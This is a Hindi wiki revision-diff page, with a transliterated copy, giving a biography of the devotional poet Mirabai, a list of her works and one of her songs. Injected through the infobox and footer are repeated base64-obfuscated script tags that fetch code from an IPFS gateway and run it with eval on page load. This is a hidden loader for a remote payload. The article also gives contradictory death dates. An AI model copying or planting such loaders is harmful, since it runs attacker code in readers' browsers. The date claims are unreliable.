Difference between revisions of "मीरां"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 46: Line 46:
  
 
'''मीरांबाई / मीराबाई'''<br />
 
'''मीरांबाई / मीराबाई'''<br />
प्रसिद्ध कृष्ण-भक्त कवयित्री मीराबाई [[जोधपुर]] के मेड़वा राजकुल की राजकुमारी थीं। इनकी जन्म-तिथि के संबंध में मतैक्य नहीं है। कुछ विद्वान् इनका जन्म 1430 ई. मानते हैं और कुछ 1498 ई.। मीरा का जीवन बड़े दु:ख में बीता। बाल्यावस्था में ही मां का देहांत हो गया। पितामह ने देखभाल की परंतु कुछ वर्ष बाद वे भी चल बसे। मीरांबाई कृष्ण-भक्ति शाखा की प्रमुख कवयित्री हैं । उनके पिता का नाम रत्नसिंह था। उनके पति कुंवर भोजराज [[उदयपुर]] के महाराणा सांगा के पुत्र थे। विवाह के कुछ समय बाद ही उनके पति का देहांत हो गया। [[Image:Mirabai-1.jpg|[[मीराबाई का मन्दिर वृन्दावन|मीराबाई का मन्दिर]], [[वृन्दावन]]<br /> Mirabai Temple, Vrindavan|thumb|left]] पति की मृत्यु के बाद उन्हें पति के साथ सती करने का प्रयास किया गया किन्तु मीरां इसके लिये तैयार नहीं हुई। [[मेवाड़]] का शासन भोजराज के सौतेले भाई के हाथ में आया, जिसने हर प्रकार से मीरा को सताया। वे संसार की ओर से विरक्त हो गयीं और साधु-संतों की संगति में हरिकीर्तन करते हुए अपना समय व्यतीत करने लगीं। कुछ समय बाद उन्होंने घर का त्याग कर दिया और तीर्थाटन को निकल गईं। मीरा बचपन से ही आध्यात्मिक विचारों के विपरीत थीं व परिस्थितियों ने उन्हें और भी अंतर्मुखी बना दिया। उन्होंने [[चित्तौड़]] त्याग दिया और संत [[रैदास]] की शिष्या बन गयीं। वे बहुत दिनों तक [[वृन्दावन]] में रहीं और फिर 1543 ई. के आसपास वे [[द्वारिका]] चली गई और जीवन के अंत तक वहीं रही। उनका निधन 1563 और 1573 ई. के बीच माना जाता है। जहाँ संवत 1547 ईस्वी में उनका देहांत हुआ । इनके जन्म को लेकर कई मतभेद रहे हैं।  
+
प्रसिद्ध कृष्ण-भक्त कवयित्री मीराबाई [[जोधपुर]] के मेड़वा राजकुल की राजकुमारी थीं। इनकी जन्म-तिथि के संबंध में मतैक्य नहीं है। कुछ विद्वान् इनका जन्म 1430 ई. मानते हैं और कुछ 1498 ई.। मीरा का जीवन बड़े दु:ख में बीता। बाल्यावस्था में ही मां का देहांत हो गया। पितामह ने देखभाल की परंतु कुछ वर्ष बाद वे भी चल बसे। मीरांबाई कृष्ण-भक्ति शाखा की प्रमुख कवयित्री हैं । उनके पिता का नाम रत्नसिंह था। उनके पति कुंवर भोजराज [[उदयपुर]] के महाराणा सांगा के पुत्र थे। विवाह के कुछ समय बाद ही उनके पति का देहांत हो गया। [[Image:Mirabai-1.jpg|[[मीराबाई का मन्दिर वृन्दावन|मीराबाई का मन्दिर]], [[वृन्दावन]]<br /> Mirabai Temple, Vrindavan|thumb|left]] पति की मृत्यु के बाद उन्हें पति के साथ सती करने का प्रयास किया गया किन्तु मीरां इसके लिये तैयार नहीं हुई। [[मेवाड़]] का शासन भोजराज के सौतेले भाई के हाथ में आया, जिसने हर प्रकार से मीरा को सताया। वे संसार की ओर से विरक्त हो गयीं और साधु-संतों की संगति में हरिकीर्तन करते हुए अपना समय व्यतीत करने लगीं। कुछ समय बाद उन्होंने घर का त्याग कर दिया और तीर्थाटन को निकल गईं। मीरा बचपन से ही आध्यात्मिक विचारों में रम गयीं थीं व परिस्थितियों ने उन्हें और भी अंतर्मुखी बना दिया। उन्होंने [[चित्तौड़]] त्याग दिया और संत [[रैदास]] की शिष्या बन गयीं। वे बहुत दिनों तक [[वृन्दावन]] में रहीं और फिर 1543 ई. के आसपास वे [[द्वारिका]] चली गई और जीवन के अंत तक वहीं रही। उनका निधन 1563 और 1573 ई. के बीच माना जाता है। जहाँ संवत 1547 ईस्वी में उनका देहांत हुआ । इनके जन्म को लेकर कई मतभेद रहे हैं।  
  
 
मीरांबाई ने कृष्ण-भक्ति के स्फुट पदों की रचना की है। ये बचपन से ही कृष्णभक्ति में रुचि लेने लगी थीं । मीरा के कृष्ण-भक्ति के पद बहुत लोकप्रिय हैं। [[हिन्दी]] के साथ-साथ [[राजस्थानी भाषा|राजस्थानी]] और [[गुजराती भाषा|गुजराती]] में भी इनकी रचनाएं पाई जाती हैं। हिन्दी के भक्त-कवियों में मीरा का स्थान बहुत ऊंचा है।
 
मीरांबाई ने कृष्ण-भक्ति के स्फुट पदों की रचना की है। ये बचपन से ही कृष्णभक्ति में रुचि लेने लगी थीं । मीरा के कृष्ण-भक्ति के पद बहुत लोकप्रिय हैं। [[हिन्दी]] के साथ-साथ [[राजस्थानी भाषा|राजस्थानी]] और [[गुजराती भाषा|गुजराती]] में भी इनकी रचनाएं पाई जाती हैं। हिन्दी के भक्त-कवियों में मीरा का स्थान बहुत ऊंचा है।

Revision as of 13:28, 2 January 2012

miraan
poora nam mirabaee
any nam miraanbaee
janm 1498
janm bhoomi merata, rajasthan
mrityu 1547
pati/patni kuanvar bhojaraj
karm bhoomi vrindavan
mukhy rachanaean barasi ka mayara, git goviand tika, rag goviand, rag sorath ke pad
vishay krishnabhakti
bhasha brajabhasha
inhean bhi dekhean kavi soochi, sahityakar soochi
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
miraanbaee ki rachanaean
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

miraanbaee / mirabaee

prasiddh krishna-bhakt kavayitri mirabaee jodhapur ke me dava rajakul ki rajakumari thian. inaki janm-tithi ke sanbandh mean mataiky nahian hai. kuchh vidvanh inaka janm 1430 ee. manate haian aur kuchh 1498 ee.. mira ka jivan b de du:kh mean bita. balyavastha mean hi maan ka dehaant ho gaya. pitamah ne dekhabhal ki parantu kuchh varsh bad ve bhi chal base. miraanbaee krishna-bhakti shakha ki pramukh kavayitri haian . unake pita ka nam ratnasianh tha. unake pati kuanvar bhojaraj udayapur ke maharana saanga ke putr the. vivah ke kuchh samay bad hi unake pati ka dehaant ho gaya.

mirabaee ka mandir, vrindavan
Mirabai Temple, Vrindavan

pati ki mrityu ke bad unhean pati ke sath sati karane ka prayas kiya gaya kintu miraan isake liye taiyar nahian huee. meva d ka shasan bhojaraj ke sautele bhaee ke hath mean aya, jisane har prakar se mira ko sataya. ve sansar ki or se virakt ho gayian aur sadhu-santoan ki sangati mean harikirtan karate hue apana samay vyatit karane lagian. kuchh samay bad unhoanne ghar ka tyag kar diya aur tirthatan ko nikal geean. mira bachapan se hi adhyatmik vicharoan mean ram gayian thian v paristhitiyoan ne unhean aur bhi aantarmukhi bana diya. unhoanne chittau d tyag diya aur sant raidas ki shishya ban gayian. ve bahut dinoan tak vrindavan mean rahian aur phir 1543 ee. ke asapas ve dvarika chali gee aur jivan ke aant tak vahian rahi. unaka nidhan 1563 aur 1573 ee. ke bich mana jata hai. jahaan sanvat 1547 eesvi mean unaka dehaant hua . inake janm ko lekar kee matabhed rahe haian.

miraanbaee ne krishna-bhakti ke sphut padoan ki rachana ki hai. ye bachapan se hi krishnabhakti mean ruchi lene lagi thian . mira ke krishna-bhakti ke pad bahut lokapriy haian. hindi ke sath-sath rajasthani aur gujarati mean bhi inaki rachanaean paee jati haian. hindi ke bhakt-kaviyoan mean mira ka sthan bahut ooancha hai.

rachit granth

miraanbaee ne char granthoan ki rachana ki–

  1. barasi ka mayara
  2. git goviand tika
  3. rag goviand
  4. rag sorath ke pad

inaki ek rachana is prakar haian-

payo ji mhean to ram ratan dhan payo .
vastu amolak di mhare sataguru, kirapa kar apanayo ॥
janam-janam ki pooanji paee, jag mean sabhi khovayo .
kharach n khootai chor n lootai, din-din badhat savayo ॥
sat ki naanv khevatiya sataguru, bhavasagar tar ayo .
'mira' ke prabhu giridhar nagar, harakh-harakh jas payo ॥

keshi ghat, vrindavan
Keshi Ghat, Vrindavan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>